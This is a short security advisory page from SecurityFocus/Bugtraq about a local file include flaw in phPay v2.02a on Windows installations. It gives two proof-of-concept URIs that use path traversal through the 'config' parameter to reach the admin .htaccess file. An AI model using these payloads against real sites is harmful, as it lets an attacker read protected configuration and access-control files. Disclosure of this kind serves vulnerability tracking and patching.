Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

phPay Windows Installations Local File Include Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess

The following example was provided in cases where the PHP 'magic_quotes_gpc' directive is enabled:

http://www.example.com/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess







 

Privacy Statement
Copyright 2009, SecurityFocus